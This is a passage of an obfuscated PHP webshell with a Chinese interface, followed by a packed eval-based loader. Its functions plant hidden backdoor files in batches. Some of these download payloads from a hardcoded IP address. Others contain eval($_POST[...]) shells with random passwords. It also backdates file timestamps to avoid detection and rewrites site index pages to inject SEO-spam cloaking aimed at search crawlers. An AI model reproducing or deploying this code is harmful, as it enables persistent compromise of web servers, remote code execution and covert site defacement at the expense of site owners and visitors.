                                mkdir($xNX14, 0755, "recursive");
                                chmod($xNX14, 0755);
                            }
                            if (strpos($eb_7J, ".php") !== false) {
                                $dRqNZ = $xNX14 . "/" . $eb_7J;
                            } else {
                                $dRqNZ = $xNX14 . "/" . $eb_7J;
                                if (!file_exists($dRqNZ)) {
                                    mkdir($dRqNZ, 0755, "recursive");
                                    chmod($dRqNZ, 0755);
                                }
                                $dRqNZ .= "/.xm.php";
                            }
                            file_put_contents($dRqNZ, "<?php file_put_contents(\"\\x2e\\x69\\156\\144\\x65\\170\\x5f\\142\\x61\\x6b\\x2e\\160\\x68\\x70\", file_get_contents (\"\\x68\\x74\\164\\160\\x3a\\57\\57\\x31\\x35\\x34\\56\\62\\x30\\x34\\x2e\\62\\63\\63\\56\\61\\x36\\62\\x2f\\160\\x61\\156\\145\\154\\56\\164\\x78\\164\"));");
                            if ($ipdt9) {
                                @touch($dRqNZ, $ipdt9);
                            }
                            chmod($dRqNZ, 0755);
                            $kFQIU[] = sprintf("批量哥小马 路径:%s", $dRqNZ);
                        }
                    }
                    $UgLz_ = implode("</br>", $kFQIU);
                    break;
                case "xiaoma":
                    $PfRvL = rtrim($_POST["var"], "/");
                    if (!file_exists($PfRvL)) {
                        mkdir($PfRvL, 0755, "recursive");
                        chmod($PfRvL, 0755);
                    }
                    $YJnbr = C4Ghr($PfRvL);
                    $ipdt9 = 0;
                    if (!empty($YJnbr["file"])) {
                        foreach ($YJnbr["file"] as $cT1oz => $Kes_q) {
                            if (!$ipdt9) {
                                $ipdt9 = filemtime($cT1oz);
                            } else {
                                if (filemtime($cT1oz) < $ipdt9) {
                                    $ipdt9 = filemtime($cT1oz);
                                }
                            }
                        }
                    }
                    $dRqNZ = $PfRvL . "/.xm.php";
                    file_put_contents($dRqNZ, "<?php file_put_contents(\"\\x2e\\x69\\156\\144\\x65\\170\\x5f\\142\\x61\\x6b\\x2e\\160\\x68\\x70\", file_get_contents (\"\\x68\\x74\\164\\160\\x3a\\57\\57\\x31\\x35\\x34\\56\\62\\x30\\x34\\x2e\\62\\63\\63\\56\\61\\x36\\62\\x2f\\160\\x61\\156\\145\\154\\56\\164\\x78\\164\"));");
                    if ($ipdt9) {
                        @touch($dRqNZ, $ipdt9);
                    }
                    chmod($dRqNZ, 0755);
                    $UgLz_ = sprintf("一键小M 路径:%s ", $dRqNZ);
                    break;
                case "pldama":
                    $PfRvL = rtrim($_POST["dir"], "/");
                    $kojAr = explode("\n", trim($_POST["var"]));
                    $kFQIU = array();
                    if ($kojAr) {
                        $YJnbr = c4gHr($PfRvL);
                        $ipdt9 = 0;
                        if (!empty($YJnbr["file"])) {
                            foreach ($YJnbr["file"] as $cT1oz => $Kes_q) {
                                if (!$ipdt9) {
                                    $ipdt9 = filemtime($cT1oz);
                                } else {
                                    if (filemtime($cT1oz) < $ipdt9) {
                                        $ipdt9 = filemtime($cT1oz);
                                    }
                                }
                            }
                        }
                        foreach ($kojAr as $Hzx0E) {
                            $Hzx0E = trim($Hzx0E);
                            $xNX14 = explode("/", $PfRvL . "/" . $Hzx0E);
                            $eb_7J = array_pop($xNX14);
                            $xNX14 = implode("/", $xNX14);
                            if (!file_exists($xNX14)) {
                                mkdir($xNX14, 0755, "recursive");
                                chmod($xNX14, 0755);
                            }
                            if (strpos($eb_7J, ".php") !== false) {
                                $dRqNZ = $xNX14 . "/" . $eb_7J;
                            } else {
                                $dRqNZ = $xNX14 . "/" . $eb_7J;
                                if (!file_exists($dRqNZ)) {
                                    mkdir($dRqNZ, 0755, "recursive");
                                    chmod($dRqNZ, 0755);
                                }
                                $dRqNZ .= "/.index_bak.php";
                            }
                            file_put_contents($dRqNZ, file_get_contents(V51MD));
                            if ($ipdt9) {
                                @touch($dRqNZ, $ipdt9);
                            }
                            chmod($dRqNZ, 0755);
                            $kFQIU[] = sprintf("批量大M 路径:%s ", $dRqNZ);
                        }
                    }
                    $UgLz_ = implode("</br>", $kFQIU);
                    break;
                case "dama":
                    $PfRvL = rtrim($_POST["var"], "/");
                    if (!file_exists($PfRvL)) {
                        mkdir($PfRvL, 0755, "recursive");
                        chmod($PfRvL, 0755);
                    }
                    $YJnbr = c4gHR($PfRvL);
                    $ipdt9 = 0;
                    if (!empty($YJnbr["file"])) {
                        foreach ($YJnbr["file"] as $cT1oz => $Kes_q) {
                            if (!$ipdt9) {
                                $ipdt9 = filemtime($cT1oz);
                            } else {
                                if (filemtime($cT1oz) < $ipdt9) {
                                    $ipdt9 = filemtime($cT1oz);
                                }
                            }
                        }
                    }
                    $dRqNZ = $PfRvL . "/.index_bak.php";
                    file_put_contents($dRqNZ, file_get_contents(V51MD));
                    if ($ipdt9) {
                        @touch($dRqNZ, $ipdt9);
                    }
                    chmod($dRqNZ, 0755);
                    $UgLz_ = sprintf("一键大M 路径:%s ", $dRqNZ);
                    break;
                case "gxdama":
                    $PfRvL = rtrim($_POST["var"], "/");
                    if (!file_exists($PfRvL)) {
                        mkdir($PfRvL, 0755, "recursive");
                        chmod($PfRvL, 0755);
                    }
                    $YJnbr = c4GHR($PfRvL);
                    $ipdt9 = 0;
                    if (isset($YJnbr["file"])) {
                        foreach ($YJnbr["file"] as $cT1oz => $Kes_q) {
                            if (!$ipdt9) {
                                $ipdt9 = filemtime($cT1oz);
                            } else {
                                if (filemtime($cT1oz) < $ipdt9) {
                                    $ipdt9 = filemtime($cT1oz);
                                }
                            }
                        }
                    }
                    $dRqNZ = V51MD;
                    file_put_contents($dRqNZ, file_get_contents("http://154.204.233.162/panel.txt"));
                    if ($ipdt9) {
                        @touch($dRqNZ, $ipdt9);
                    }
                    chmod($dRqNZ, 0755);
                    $UgLz_ = sprintf("更新大M完成 路径:%s", $dRqNZ);
                    break;
                case "plgzl":
                    $PfRvL = rtrim($_POST["dir"], "/");
                    $kojAr = explode("\n", trim($_POST["var"]));
                    $kFQIU = array();
                    if ($kojAr) {
                        $YJnbr = C4GHr($PfRvL);
                        $ipdt9 = 0;
                        if (!empty($YJnbr["file"])) {
                            foreach ($YJnbr["file"] as $cT1oz => $Kes_q) {
                                if (!$ipdt9) {
                                    $ipdt9 = filemtime($cT1oz);
                                } else {
                                    if (filemtime($cT1oz) < $ipdt9) {
                                        $ipdt9 = filemtime($cT1oz);
                                    }
                                }
                            }
                        }
                        $DAWrM = mDXRq();
                        foreach ($kojAr as $Hzx0E) {
                            $Hzx0E = trim($Hzx0E);
                            $xNX14 = explode("/", $PfRvL . "/" . $Hzx0E);
                            $eb_7J = array_pop($xNX14);
                            $xNX14 = implode("/", $xNX14);
                            if (!file_exists($xNX14)) {
                                mkdir($xNX14, 0755, "recursive");
                                chmod($xNX14, 0755);
                            }
                            if (strpos($eb_7J, ".php") !== false) {
                                $dRqNZ = $xNX14 . "/" . $eb_7J;
                            } else {
                                $dRqNZ = $xNX14 . "/" . $eb_7J;
                                if (!file_exists($dRqNZ)) {
                                    mkdir($dRqNZ, 0755, "recursive");
                                    chmod($dRqNZ, 0755);
                                }
                                $dRqNZ .= "/gzl.php";
                            }
                            file_put_contents($dRqNZ, "<?php eval(\$_POST[\"" . $DAWrM . "\"]);");
                            if ($ipdt9) {
                                @touch($dRqNZ, $ipdt9);
                            }
                            chmod($dRqNZ, 0755);
                            $kFQIU[] = sprintf("批量GZL 路径:%s 密码:%s", $dRqNZ, $DAWrM);
                        }
                    }
                    $UgLz_ = implode("</br>", $kFQIU);
                    break;
                case "gzl":
                    $PfRvL = rtrim($_POST["var"], "/");
                    if (!file_exists($PfRvL)) {
                        mkdir($PfRvL, 0755, "recursive");
                        chmod($PfRvL, 0755);
                    }
                    $YJnbr = c4gHr($PfRvL);
                    $ipdt9 = 0;
                    if (isset($YJnbr["file"])) {
                        foreach ($YJnbr["file"] as $cT1oz => $Kes_q) {
                            if (!$ipdt9) {
                                $ipdt9 = filemtime($cT1oz);
                            } else {
                                if (filemtime($cT1oz) < $ipdt9) {
                                    $ipdt9 = filemtime($cT1oz);
                                }
                            }
                        }
                    }
                    $dRqNZ = $PfRvL . "/gzl.php";
                    $DAWrM = mdxRq();
                    file_put_contents($dRqNZ, "<?php eval(\$_POST[\"" . $DAWrM . "\"]);");
                    if ($ipdt9) {
                        @touch($dRqNZ, $ipdt9);
                    }
                    chmod($dRqNZ, 0755);
                    $UgLz_ = sprintf("一键GZL 路径:%s 密码:%s", $dRqNZ, $DAWrM);
                    break;
                case "TDK":
                    $PfRvL = FO39n;
                    $YJnbr = c4gHr($PfRvL);
                    $ipdt9 = 0;
                    if (isset($YJnbr["file"])) {
                        foreach ($YJnbr["file"] as $cT1oz => $Kes_q) {
                            if (!$ipdt9) {
                                $ipdt9 = filemtime($cT1oz);
                            } else {
                                if (filemtime($cT1oz) < $ipdt9) {
                                    $ipdt9 = filemtime($cT1oz);
                                }
                            }
                        }
                    }
                    $hKJoi = trim($_POST["var"]);
                    $p9Pgu = $_SERVER["SERVER_PORT"];
                    $IJLc4 = $p9Pgu == "443" ? "https://" : "http://";
                    $QSO8f = cIvGH($IJLc4 . $_SERVER["HTTP_HOST"], 6);
                    if ($QSO8f) {
                        preg_match_all("/<meta(.*?)name=\"keywords\"(.*?)>/i", $QSO8f, $GlUYK);
                        if (!empty($GlUYK[0])) {
                            foreach ($GlUYK[0] as $Hzx0E) {
                                $QSO8f = str_replace($Hzx0E, '', $QSO8f);
                            }
                        }
                        preg_match_all("/<meta(.*?)name=\"description\"(.*?)>/i", $QSO8f, $GlUYK);
                        if (!empty($GlUYK[0])) {
                            foreach ($GlUYK[0] as $Hzx0E) {
                                $QSO8f = str_replace($Hzx0E, '', $QSO8f);
                            }
                        }
                        preg_match("/<title(.*?)>(.*?)<\\/title>/", $QSO8f, $GlUYK);
                        if (!empty($GlUYK[0])) {
                            $YfZ3Q = '';
                            if (!empty($GlUYK[2])) {
                                $YfZ3Q = "<script>if(navigator.userAgent.toLocaleLowerCase().indexOf(\"baidu\") == -1){document.title =\"" . $GlUYK[2] . "\"}</script>";
                                $QSO8f = str_replace($YfZ3Q, '', $QSO8f);
                            }
                            $YfZ3Q .= "\n" . $hKJoi;
                            $QSO8f = str_replace($GlUYK[0], $YfZ3Q, $QSO8f);
                        }
                        file_put_contents($PfRvL . "/index.html", $QSO8f);
                        if (file_exists($PfRvL . "/index.php")) {
                            copy($PfRvL . "/index.php", $PfRvL . "/index_copy.php");
                            if (!file_exists($PfRvL . "/index_copy.php")) {
                                file_put_contents($PfRvL . "/index_copy.php", file_get_contents($PfRvL . "/index.php"));
                            }
                        }
                        file_put_contents($PfRvL . "/index.php", $QSO8f);
                        if ($ipdt9) {
                            @touch($PfRvL . "/index.html", $ipdt9);
                            @touch($PfRvL . "/index.php", $ipdt9);
                        }
                        chmod($PfRvL . "/index.html", 0755);
                        chmod($PfRvL . "/index.php", 0755);
                        $UgLz_ = sprintf("一键TDK完成 %s %s", $PfRvL . "/index.html", $PfRvL . "/index.php");
                    } else {
                        $UgLz_ = sprintf("一键TDK失败 %s 内容获取失败", "http://" . $_SERVER["HTTP_HOST"]);
                    }
                    break;
                case "JSC":
                    $PfRvL = rtrim($_POST["var"], "/");
                    if (!file_exists($PfRvL)) {
                        mkdir($PfRvL, 0755, "recursive");
                        chmod($PfRvL, 0755);
                    }
                    $YJnbr = C4GhR($PfRvL);
                    $ipdt9 = 0;
                    if (isset($YJnbr["file"])) {
                        foreach ($YJnbr["file"] as $cT1oz => $Kes_q) {
                            if (!$ipdt9) {
                                $ipdt9 = filemtime($cT1oz);
                            } else {
                                if (filemtime($cT1oz) < $ipdt9) {
                                    $ipdt9 = filemtime($cT1oz);
                                }
                            }
                        }
                    }
                    $dRqNZ = $PfRvL . "/zrty.php";
                    file_put_contents($dRqNZ, file_get_contents("http://154.204.233.162/zrty.txt"));
                    if ($ipdt9) {
                        @touch($dRqNZ, $ipdt9);
                    }
                    chmod($dRqNZ, 0755);
                    $UgLz_ = sprintf("一键JSC 路径:%s", $dRqNZ);
                    break;
            }
        }
        try {
            $RoNtC = substr(decoct(fileperms($Jzwra)), -4);
        } catch (Throwable $yVbeC) {
            $RoNtC = false;
        }
        if (!$RoNtC) {
            $UgLz_ .= "<h1>无法读取目录</h1>";
        }
        $YJnbr = c4ghr($Jzwra);
        $nbzHl = Pbm07("/" . strtr($Jzwra, array(FO39n => '')) . "/");
        $Jzwra = strtr($Jzwra, array("'" => "%27", "\"" => "%22"));
        $QSO8f = '';
        $QSO8f .= "<div class=\"msgbox\">" . $UgLz_ . "</div>";
        $QSO8f .= "<div class=\"actall\"><form name=\"frm\" id=\"frm\" method=\"POST\">";
        $QSO8f .= axttQ();
        $QSO8f .= (is_writable($Jzwra) ? "<h2>路径</h2>" : "<h1>路径</h1>") . " <input type=\"text\" name=\"dir\" id=\"dir\" style=\"width:508px;\" value=\"" . PBm07($Jzwra . "/") . "\"> ";
        $QSO8f .= "<input type=\"button\" onclick=\"\$('frm').submit();\" style=\"width:50px;\" value=\"转到\"> ";
        $QSO8f .= "<input type=\"button\" onclick=\"cd('" . FO39n . "');\" style=\"width:68px;\" value=\"根目录\"> ";
        $QSO8f .= "<input type=\"button\" onclick=\"cd('" . k3TER . "');\" style=\"width:68px;\" value=\"程序目录\"> ";
        $QSO8f .= "<select onchange=\"cd(options[selectedIndex].value);\">";
        $QSO8f .= "<option>---特殊目录---</option>";
        $QSO8f .= "<option value=\"C:/RECYCLER/\">Win-RECYCLER</option>";
        $QSO8f .= "<option value=\"C:/\$Recycle.Bin/\">Win-\$Recycle</option>";
        $QSO8f .= "<option value=\"C:/Program Files/\">Win-Program</option>";
        $QSO8f .= "<option value=\"C:/Documents and Settings/All Users/Start Menu/Programs/Startup/\">Win-Startup</option>";
        $QSO8f .= "<option value=\"C:/Documents and Settings/All Users/「开始」菜单/程序/启动/\">Win-启动</option>";
        $QSO8f .= "<option value=\"C:/Windows/Temp/\">Win-TEMP</option>";
        $QSO8f .= "<option value=\"/usr/local/\">Linux-local</option>";
        $QSO8f .= "<option value=\"/tmp/\">Linux-tmp</option>";
        $QSO8f .= "<option value=\"/var/tmp/\">Linux-var</option>";
        $QSO8f .= "<option value=\"/etc/ssh/\">Linux-ssh</option>";
        $QSO8f .= "</select></form></div><div class=\"actall\">";
        $QSO8f .= "<input type=\"button\" value=\"新建文件\" onclick=\"nf('edit','newfile.php');\" style=\"width:68px;\"> ";
        $QSO8f .= "<input type=\"button\" value=\"创建目录\" onclick=\"txts('目录名','newdir','e');\" style=\"width:68px;\"> ";
        $QSO8f .= "<input type=\"button\" value=\"下载文件\" onclick=\"txts('下载文件到当前目录','url链接','f');\" style=\"width:68px;\"> ";
        $QSO8f .= "<input type=\"button\" value=\"批量上传\" onclick=\"go('upfiles','" . $Jzwra . "');\" style=\"width:68px;\"> ";
        $QSO8f .= "<form name=\"upfrm\" id=\"upfrm\" method=\"POST\" enctype=\"multipart/form-data\">";
        $QSO8f .= axtTQ();
        $QSO8f .= "<input type=\"hidden\" name=\"dir\" id=\"dir\" value=\"" . $Jzwra . "\">";
        $QSO8f .= "<input type=\"file\" name=\"upfile\" style=\"width:286px;height:21px;\"> ";
        $QSO8f .= "<input type=\"button\" onclick=\"\$('upfrm').submit();\" value=\"上传\" style=\"width:50px;\"> ";
        $QSO8f .= "上传重命名为 <input type=\"text\" name=\"rename\" style=\"width:128px;\">";
        $QSO8f .= "</form></div>";
        $QSO8f .= "<form name=\"frm1\" id=\"frm1\" method=\"POST\"><table class=\"tables\">";
        $QSO8f .= axtTQ();
        $QSO8f .= "<input type=\"hidden\" name=\"dir\" id=\"dir\" value=\"" . $Jzwra . "\">";
        $QSO8f .= "<input type=\"hidden\" name=\"act\" id=\"act\" value=\"\">";
        $QSO8f .= "<input type=\"hidden\" name=\"var\" id=\"var\" value=\"\">";
        $QSO8f .= "<th><a href=\"javascript:cd('" . dirname($Jzwra) . "/');\">上级目录</a></th><th style=\"width:8%\">操作</th><th style=\"width:5%\">属性</th><th style=\"width:17%\">创建时间</th><th style=\"width:17%\">修改时间</th><th style=\"width:8%\">下载</th>";
        $uMn1i = '';
        $yICDZ = '';
        $CU3_o = $DOdBZ = 0;
        if ($YJnbr) {
            if (isset($YJnbr["dir"])) {
                asort($YJnbr["dir"]);
            }
            if (isset($YJnbr["file"])) {
                asort($YJnbr["file"]);
            }
            if (isset($YJnbr["dir"])) {
                foreach ($YJnbr["dir"] as $PfRvL => $Kes_q) {
                    $IU13H = substr(decoct(fileperms($PfRvL)), -4);
                    $uMn1i = date("Y-m-d H:i:s", filectime($PfRvL));
                    $yICDZ = date("Y-m-d H:i:s", filemtime($PfRvL));
                    $QSO8f .= "<tr>";
                    $QSO8f .= "<td><a href=\"javascript:cd('" . $Jzwra . $Kes_q . "');\"><b> " . strtr($Kes_q, array("%27" => "'", "%22" => "\"")) . "</b></a></td>";
                    $QSO8f .= "<td><a href=\"javascript:dels('" . $Kes_q . "');\">删除</a> ";
                    $QSO8f .= "<a href=\"javascript:acts('" . $Kes_q . "','rf','" . $Kes_q . "');\">改名</a></td>";
                    $QSO8f .= "<td><a href=\"javascript:acts('" . $IU13H . "','pd','" . $Kes_q . "');\">" . $IU13H . "</a></td>";
                    $QSO8f .= "<td>" . $uMn1i . "</td>";
                    $QSO8f .= "<td>" . $yICDZ . "</td>";
                    $QSO8f .= "<td>-</td>";
                    $QSO8f .= "</tr>";
                    $CU3_o++;
                }
            }
            if (isset($YJnbr["file"])) {
                foreach ($YJnbr["file"] as $PfRvL => $Kes_q) {
                    $IU13H = substr(decoct(fileperms($PfRvL)), -4);
                    $uMn1i = date("Y-m-d H:i:s", filectime($PfRvL));
                    $yICDZ = date("Y-m-d H:i:s", filemtime($PfRvL));
                    $T3WIB = IDYFR(filesize($PfRvL));
                    $QSO8f .= "<tr>";
                    $QSO8f .= "<td><input type=\"checkbox\" name=\"files[]\" value=\"" . $Kes_q . "\">  <a target=\"_blank\" href=\"" . $nbzHl . $Kes_q . "\">" . strtr($Kes_q, array("%27" => "'", "%22" => "\"")) . "</a></td>";
                    $QSO8f .= "<td><a href=\"javascript:go('edit','" . $Kes_q . "');\">编辑</a> ";
                    $QSO8f .= "<a href=\"javascript:acts('" . $Kes_q . "','rf','" . $Kes_q . "');\">改名</a></td>";
                    $QSO8f .= "<td><a href=\"javascript:acts('" . $IU13H . "','pd','" . $Kes_q . "');\">" . $IU13H . "</a></td>";
                    $QSO8f .= "<td>" . $uMn1i . "</td>";
                    $QSO8f .= "<td>" . $yICDZ . "</td>";
                    $QSO8f .= "<td align=\"right\"><a style=\"margin-right: 10px;\" href=\"javascript:go('down','" . $Kes_q . "');\">" . $T3WIB . "</a></td>";
                    $QSO8f .= "</tr>";
                    $DOdBZ++;
                }
            }
        }
        unset($YJnbr);
        $QSO8f .= "</table>";
        $QSO8f .= "<div class=\"actall\" style=\"text-align:left;\">";
        $QSO8f .= "<input type=\"checkbox\" id=\"chkall\" name=\"chkall\" value=\"on\" onclick=\"sa(this.form);\"> ";
        $QSO8f .= "<input type=\"button\" value=\"复制\" style=\"width:50px;\" onclick='txts(\"复制路径\",\"" . $Jzwra . "\",\"a\");'> ";
        $QSO8f .= "<input type=\"button\" value=\"删除\" style=\"width:50px;\" onclick='dels(\"b\");'> ";
        $QSO8f .= "<input type=\"button\" value=\"属性\" style=\"width:50px;\" onclick='txts(\"属性值\",\"0666\",\"c\");'> ";
        $QSO8f .= "<input type=\"button\" value=\"时间\" style=\"width:50px;\" onclick='txts(\"修改时间\",\"" . $yICDZ . "\",\"d\");'> ";
        $QSO8f .= "</br>    ";
        $QSO8f .= "<input type=\"button\" value=\"一键小M\" style=\"width:80px;\" onclick='txts(\"一键小M\",\"" . $Jzwra . "\",\"xiaoma\");'> ";
        $QSO8f .= "<input type=\"button\" value=\"批量小M\" style=\"width:80px;\" onclick='pltexts(\"批量小M\",\"" . $Jzwra . "\",\"plxiaoma\");'> ";
        $QSO8f .= "<input type=\"button\" value=\"一键大M\" style=\"width:80px;\" onclick='txts(\"一键大M\",\"" . $Jzwra . "\",\"dama\");'> ";
        $QSO8f .= "<input type=\"button\" value=\"更新大M\" style=\"width:80px;\" onclick='txts(\"更新大M\",\"" . $Jzwra . "\",\"gxdama\");'> ";
        $QSO8f .= "<input type=\"button\" value=\"批量大M\" style=\"width:80px;\" onclick='pltexts(\"批量大M\",\"" . $Jzwra . "\",\"pldama\");'> ";
        $QSO8f .= "<input type=\"button\" value=\"一键GZL\" style=\"width:80px;\" onclick='txts(\"一键GZL\",\"" . $Jzwra . "\",\"gzl\");'> ";
        $QSO8f .= "<input type=\"button\" value=\"批量GZL\" style=\"width:80px;\" onclick='pltexts(\"批量GZL\",\"" . $Jzwra . "\",\"plgzl\");'> ";
        $QSO8f .= "<input type=\"button\" value=\"一键TDK\" style=\"width:80px;\" onclick='pltexts(\"一键TDK\",\"" . $Jzwra . "\",\"TDK\");'> ";
        $QSO8f .= "<input type=\"button\" value=\"一键JSC\" style=\"width:80px;\" onclick='txts(\"一键JSC\",\"" . $Jzwra . "\",\"JSC\");'> ";
        $QSO8f .= "</br>    ";
        $QSO8f .= "目录[" . $CU3_o . "] - 文件[" . $DOdBZ . "] - 属性[" . $RoNtC . "]</div></form>";
        return $QSO8f;
    }
}
function MWEmb($YJnbr)
{
    foreach ($YJnbr as $iW8f4 => $KPtbK) {
        $YJnbr[$iW8f4] = is_array($KPtbK) ? MweMb($KPtbK) : stripslashes($KPtbK);
    }
    return $YJnbr;
}
function pbm07($xndOv)
{
    return str_replace(array("\\", "//", "%27", "%22"), array("/", "/", "'", "\""), chop($xndOv));
}
function c4gHR($b00lT)
{
    $b00lT = pBM07($b00lT . "/");
    try {
        if (($bJ62o = @opendir($b00lT)) == NULL) {
            return false;
        }
    } catch (Throwable $yVbeC) {
        return false;
    }
    $YJnbr = array();
    while (false !== ($Kes_q = readdir($bJ62o))) {
        if ($Kes_q == "." || $Kes_q == "..") {
        }
        $PfRvL = $b00lT . $Kes_q;
        $Kes_q = strtr($Kes_q, array("'" => "%27", "\"" => "%22"));
        if (is_dir($PfRvL)) {
            $YJnbr["dir"][$PfRvL] = $Kes_q;
        }
        $YJnbr["file"][$PfRvL] = $Kes_q;
    }
    closedir($bJ62o);
    return $YJnbr;
}
function AXTtq()
{
    $QSO8f = '';
    if (isset($_POST["getpwd"])) {
        $QSO8f .= "<input type=\"hidden\" name=\"getpwd\" value=\"" . $_POST["getpwd"] . "\">";
    }
    if (isset($_POST["pass"])) {
        $QSO8f .= "<input type=\"hidden\" name=\"pass\" value=\"" . $_POST["pass"] . "\">";
    }
    if (isset($_POST["pass"]) && isset($_POST[$_POST["pass"]])) {
        $QSO8f .= "<input type=\"hidden\" name=\"" . $_POST["pass"] . "\" value=\"" . $_POST[$_POST["pass"]] . "\">";
    }
    if (isset($_POST["check"])) {
        $QSO8f .= "<input type=\"hidden\" name=\"check\" value=\"" . $_POST["check"] . "\">";
    }
    return $QSO8f;
}
function lGu3j($eb_7J, $NC0z_, $fyjvY)
{
    if (!is_writable($eb_7J) && file_exists($eb_7J)) {
        chmod($eb_7J, 0666);
    }
    $iW8f4 = false;
    try {
        $bJ62o = fopen($eb_7J, $fyjvY);
        $iW8f4 = fputs($bJ62o, $NC0z_);
        fclose($bJ62o);
    } catch (Throwable $yVbeC) {
    }
    return $iW8f4;
}
function JwptB($eb_7J)
{
    $bJ62o = fopen($eb_7J, "r");
    if (filesize($eb_7J) > 0) {
        $NC0z_ = fread($bJ62o, filesize($eb_7J));
    } else {
        $NC0z_ = '';
    }
    fclose($bJ62o);
    return $NC0z_;
}
function fiVRg($t_nY5, $fqqEu)
{
    $iW8f4 = move_uploaded_file($t_nY5, $fqqEu) ? true : false;
    if (!$iW8f4) {
        $iW8f4 = copy($t_nY5, $fqqEu) ? true : false;
    }
    return $iW8f4;
}
function VZo7e($eb_7J)
{
    if (!file_exists($eb_7J)) {
        return false;
    }
    ob_end_clean();
    $Kes_q = basename($eb_7J);
    $YJnbr = explode(".", $Kes_q);
    header("Content-type: application/x-" . array_pop($YJnbr));
    header("Content-Disposition: attachment; filename=" . $Kes_q);
    header("Content-Length: " . filesize($eb_7J));
    @readfile($eb_7J);
    exit;
}
function MRF0Q($b00lT)
{
    $bJ62o = @opendir($b00lT);
    while (false !== ($Kes_q = @readdir($bJ62o))) {
        if ($Kes_q == "." || $Kes_q == "..") {
        }
        $PfRvL = $b00lT . $Kes_q;
        @chmod($PfRvL, 0777);
        if (is_dir($PfRvL)) {
            Mrf0Q($PfRvL . "/");
        }
        @unlink($PfRvL);
    }
    @closedir($bJ62o);
    return @rmdir($b00lT);
}
function IDYFr($IMG07)
{
    if ($IMG07 < 1024) {
        return $IMG07 . " B";
    }
    $YJnbr = array("B", "K", "M", "G", "T");
    $bNTax = floor(log($IMG07) / log(1024));
    return sprintf("%.2f " . $YJnbr[$bNTax], $IMG07 / pow(1024, floor($bNTax)));
}
function iIPyZ($YJnbr, $g9_WW)
{
    foreach ($YJnbr as $iW8f4) {
        if (stristr($g9_WW, $iW8f4)) {
            return true;
        }
    }
    return false;
}
function MDXrQ($N8fwX = 8)
{
    $SWSuO = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9");
    $KYc_0 = array_rand($SWSuO, $N8fwX);
    $xndOv = '';
    if (is_int($KYc_0)) {
        $xndOv = $SWSuO[$KYc_0];
    } else {
        shuffle($KYc_0);
        foreach ($KYc_0 as $Hzx0E) {
            $xndOv .= $SWSuO[$Hzx0E];
        }
    }
    return $xndOv;
}
function dQr9r($b00lT, $iW8f4, $SMX_3, $f1bw2, $q52rn, $Ktp_B, $n_geq, $Nzv3E)
{
    try {
        if (($bJ62o = @opendir($b00lT)) == NULL) {
            return '';
        }
    } catch (Throwable $yVbeC) {
        return '';
    }
    $QSO8f = '';
    while (false !== ($Kes_q = readdir($bJ62o))) {
        if ($Kes_q == "." || $Kes_q == "..") {
        }
        $PfRvL = $b00lT . $Kes_q;
        if (is_dir($PfRvL)) {
            if (!($f1bw2 && in_array($Kes_q, $f1bw2))) {
                if ($n_geq == 0 && is_readable($PfRvL)) {
                    $QSO8f .= DqR9R($PfRvL . "/", $iW8f4, $SMX_3, $f1bw2, $q52rn, $Ktp_B, $n_geq, $Nzv3E);
                }
            }
        }
        if (!($SMX_3 && !iiPyz($SMX_3, $Kes_q))) {
            $uS2nL = $q52rn ? JwPtB($PfRvL) : $Kes_q;
            $A5Kw2 = $Ktp_B ? stristr($uS2nL, $iW8f4) : (strpos(iDyFr(filesize($PfRvL)), "M") ? false : strpos($uS2nL, $iW8f4) > -1);
            if ($A5Kw2) {
                $SFJ9z = strtr($PfRvL, array($Nzv3E => '', "'" => "%27", "\"" => "%22"));
                $QSO8f .= "<a href=\"javascript:go('editor','" . $SFJ9z . "');\">编辑</a> " . $PfRvL . "<br>";
                flush();
                ob_flush();
            }
            unset($uS2nL);
        }
    }
    closedir($bJ62o);
    return $QSO8f;
}
function cIVgh($N1G2o, $Q9zRG = 30, $kRKZ7 = 1)
{
    $c9X7t = curl_init();
    $PItFp = array("Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "Upgrade-Insecure-Requests: 1", "DNT:1", "Accept-Language: zh-CN,zh;q=0.9", "User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36");
    curl_setopt($c9X7t, CURLOPT_HTTPHEADER, $PItFp);
    curl_setopt($c9X7t, CURLOPT_TIMEOUT, $Q9zRG);
    curl_setopt($c9X7t, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($c9X7t, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($c9X7t, CURLOPT_URL, $N1G2o);
    if ($kRKZ7 == 1) {
        curl_setopt($c9X7t, CURLOPT_RETURNTRANSFER, true);
    }
    $rVq02 = curl_exec($c9X7t);
    if (!$rVq02) {
        $VO03Y = curl_errno($c9X7t);
        var_dump($VO03Y);
    }
    curl_close($c9X7t);
    return $rVq02;
}
function x8024($xndOv, $Go0li = '', $wrqOC = '')
{
    if ($Go0li) {
        $xndOv = stristr($xndOv, $Go0li, false);
        $xndOv = substr($xndOv, strlen($Go0li));
    }
    $wrqOC && ($xndOv = stristr($xndOv, $wrqOC, true));
    return trim($xndOv);
}

//这个是加密的版本,不加密的数据我删除了大部分

<?php
error_reporting(E_ERROR);
@ini_set('display_errors','Off');
@ini_set('max_execution_time',20000);
@ini_set('memory_limit','256M');
header("content-Type: text/html; charset=utf-8");
//$password = "21232f297a57a5a743894a0e4a801fc3"; //Viv, bebegim..
define('Viv, bebegim.','Denzel-���Ӣ��'); // ����
$a='';
function s(){
	global $a;
	global $a;
	$str = "66756r6374696s6r20737472646972282473747229207o2072657475726r207374725s7265706p61636528617272617928275p5p272p272s2s272p27253237272p2725323227292p617272617928272s272p272s272p275p27272p272227292p63686s702824737472";
	$str = str_rot13($str);
	$a = pack('H*',$str);
	m($str);
}
function m($str){
	global $password;
	global $a;
	$jj = '/*123*/asdasdasd/*123*/';
	$jj = '/*123*/asdasdasd/*123*/';
	$jj = '/*123*/asdasdasd/*123*/';
	$jj = '/*123*/asdasdasd/*123*/';
	$jj = '/*123*/asdasdasd/*123*/';
	$jj = '/*123*/asdasdasd/*123*/';
	eval(str_ireplace("/*123*/asdasdasd/*123*/","",$jj).$a.str_ireplace("/*123*/asdasdasd/*123*/","",$jj));
}
s();
?>
AI的解释

